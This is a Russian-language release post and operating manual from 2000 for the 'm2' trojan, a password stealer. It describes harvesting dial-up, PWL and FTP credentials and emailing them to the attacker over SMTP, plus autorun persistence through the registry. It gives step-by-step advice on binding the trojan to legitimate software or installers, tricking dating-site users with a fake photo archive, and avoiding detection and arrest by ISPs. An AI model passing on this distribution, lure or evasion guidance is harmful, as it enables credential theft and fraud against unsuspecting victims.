|
Вышла первая версия нового русского трояна m2, пока ещо не видимиго для AVP.
В комплект поставки входит: сам конь - m2_dll.exe, m2_jpg.exe, m2_rundll16.exe(несколько модификаций с разными иконками),
конь версии SelfExtractor - m2_selfextractor, и графический конфигуратор - GuiConf.exe
Скачать
Внимание! Программа создана исключительно в образовательных целях. Автор не несёт на себе ответственность
за её использование, действуйте на свой страх и риск.
Возможности:
ДиалАп пароли с телефонами, логинами, со скриптами, и с dns серверами.
Пароли из PWL файлов.
Пароли из EDialer'а.
Пароли от Windows commander'а.
Определяет версию ОС.
Определяет используемое соединение(если это ДиалАп).
Определяет используемое устройство, для выхода в инет.
Какнить чего ещо добавлю, пишите ваши пожелания мне на мыло
[email protected] или
в оффлайн ICQ, мой номер - 20532741
При обнаружении коня всякими антивирусами или ещо какими антитроянскими прогами, просьба проинформировать
меня об этом, будем принимать меры :)
Принцип действия:
Для получения ДиалАп паролей динамически подгружается Rasapi32.dll, и импортируются
функции RasGetEntryProperties и RasGetEntryDialParams, которые достают пароли, телефоны и
прочие скрипты из маздаевской телефонной книги.
Для получения паролей из PWL файлов в маздайе предусмотренна специальная функция
WNetEnumCachedPasswords, которая импортируется из mpr.dll динамически.
FTP пароли от WindowsCommander'а берутся из ини файла wcx_ftp.ini, который лежит
в маздай папке. Как пользоваться этими паролями?
Ставите себе WindowsCommander 4.0, делаете ftp соединение с каким нить паролем, лезете в
маздай папку и ищите файл wcx_ftp.ini, открываете его и находите то соединение, какое вы только что
сделал, ищите там строку с паролем, она должна выглядеть типа :A54F435E3D234A876BA469,
и меняете её на ту что пришла вам, естессно ftp сервер должен быть то же что вам пришло.
Щас имеется в наличии две версии это коня, первая: m2_jpg.exe, m2_dll.exe, m2_rundll16.exe - 24 кило весом, рекомендуется склеивать
его с разными прогами(см. ниже), и m2_selfextractor.exe - 28 кило весом, в этом трояне очень хорошо
реализована эмуляция SelfExtractor'а, он сделан таким образом, что на экране появится сообщение
об ошибке в архиве, его НЕ рекомедуется склеивать с чем либо по причине того,
что кроме проги, с которой вы его склеите, на экране появится окно этого самого SelfExtractor'а.
Если вы всётаки решили не исползовать версию SelfExtractor, то юзайте другую версию(m2_dll.exe, m2_jpg, m2_rundll16.exe).
Что надо делать после конфигурации и как впаривать коня.
Если вы используете версию не SelfExtractor, то настроенный конь ещо не пригоден для юзания,
его надо склеить с какой нить друго прогой. Лезете на http://blade.slak.org
и качаете прогу Joiner, или на http://sennaspy.tsx.org
и качаете прогу One EXE Maker2000. Эти проги позволяют склеивать два файла между собой(конь и какая нить полезная прога).
Вариант №2, Использование программ, создающие Setup файлы. Берёте какую-нить полезную прогу, качаете
какой-нить InstallMaker (MindVision Installer VISE,
Wise Installation System, GkSetup,
Setup Generator). Прогу помещаете в setup, и запихиваете
коня, в установках ставите так, что бы конь запускался без разрешения пользователя.
Если вы используете версию SelfExtractor, то в этом случае его можно впаривать под видом
архива чего либо, ну фоток или ещо чего. Если вы решили использовать другую версию без SelfExtractor'a,
то это может быть какая либо полезная прога, склеенная с конём, или setup, всё это впаривается как
всякие проги, проги с инсталяторами, и т.д.
Если вдруг вам понадобилось сменить иконку, в инете есть рульная прога MicroAngelo.
Приведу один пример не плохого способа как впаривать коня всяким ламерам. Идёте на сервер знакомств(
www.mheart.ru, www.fortuna.ru,
www.kiss.ru, и др.), и пишите всем подряд, типа "меня зовут так-то, я
бы хотел с тобой познакомиться, и т.д. и т.п.(конешно про себя писать не надо, нужно чо нить придумать :),
и прикладываете к письму свои фотки, ну тоесть коня, в данном случае лучше юзать версию SelfExtractor.
Ваша безопасность
В последнее время, злые дядьки-админы разных провайдеров стали ставить на свои момедные пулы АОНы.
Это очень сильно обламывает, т.к. это реальная опасность быть пойманым, в лучшем случае вам просто
позвонит владелец аккаунта, и предложит вернуть не много денег, за его спизженные часы, ну а в худшем
вам могут позвонить в дверь дядьки в форме.
Как всё таки определить наличие АОНа
Очень просто. Звоните на момедный номер телефоном, и слушаете как там снимают трубку, обычно без АОНа
это выглядит как один двойной щелчок, а с АОНом слышно два двойных щелчка, сначала трубу снимает АОН(или модем),
происходит один двойной щелчок, а потом сам модем(или АОН), и сразу слышен ещо один двойной щелчок.
Для тренировки позвоните на 9955555, и вы сразу поймёте, как звучат АОНы.
Небольшой список телефонов с АОНами
9955555, 9955556 - MTU
9951111 - Cityline
Конешно на Citylen'е есть ещо другие телефоны, но к сожелению всех их я не проверял,
знаю точно что на ситулине есть телефон 9133949 без АОНа(если ещо его туда не поставили :)
Некоторые диапазоны сетей провайдеров.
Например вам пришли пароли, и в письме указан ипи, ну например 212.188.***.***,
По этому ипи адресу можно определить провайдера.
Вот некоторые диапазоны сетей которые я помню:
212.188.***.*** - MTU
195.146.***.*** - Cityline
195.239.***.***, 194.67.***.*** - Russia Online
213.148.***.*** - Comintern
195.2.***.*** - Mr.Postman
195.146.***.*** - Relline
194.186.***.*** - Rline
195.230.***.*** - Tcnet
212.44.***.*** - Sovintel
212.92.***.*** - Cea
194.58.***.*** - Relcom
195.14.***.*** - Corbina
Как настроить
To: сюда вы вписываете своё мыло, на которое будут приходить пароли (тестировалось на mail.ru и chat.ru)
SMTP server: ваш smtp сервер для отправки почты, если вы ещо не знаете какой у вас smtp сервер,
рекомендуется выяснить это у вашей мыльной службы. Например, у вас имеется мыло на www.mail.ru,
то ихний smtp сервер - smtp.mail.ru, или у вас мыло на chat.sru,
тогда у них mail.chat.ru. Если всётаки вы незнаете какой smtp сервер вашего мыла, то пароли вам нихрена не придут.
Description: Просто название, или уникальное имя, или ид, вашего коня
Урл для апдейта: Урл на сервере к вашему сконфигуренному коню, нужно для обновлений старых версий,
по мере появления новых.
Имя файла: такое имя будет носить конь в системе жертвы, и такое-же имя будет в реестре.
Например, win32.exe, windll.exe, rundll16.exe и тд, обязательно долно оканчиваться .exe, а то работать НЕ БУДЕТ!
Описание в реестре: Описание коня в реестре(в автозапуске(run)), должно иметь смысл с именем файла. Например имя
файла Rundll16.exe, описание в реестре - Rundll16 system module.
Через сколько дней повторять посылку: Через сколько дней слать пароли, например есть это 5-ть,
то пароли будут приходить каждые 5-ть дней, рекомендуемое значение 4-6.
Где жить: место где будет жить троян, или Windows папка, или System папка.
Откуда запускаться: HKCU - HKEY_CURRENT_USER, HKLM - HKEY_LOCAL_MACHINE
Нажимаете кнопку Browz, выбираете коня, и жмёте кнопку Create. Всё! сконфигуренный конь лежит в папке InfeCteD и готов к использованию.
Myztic © 2000
|
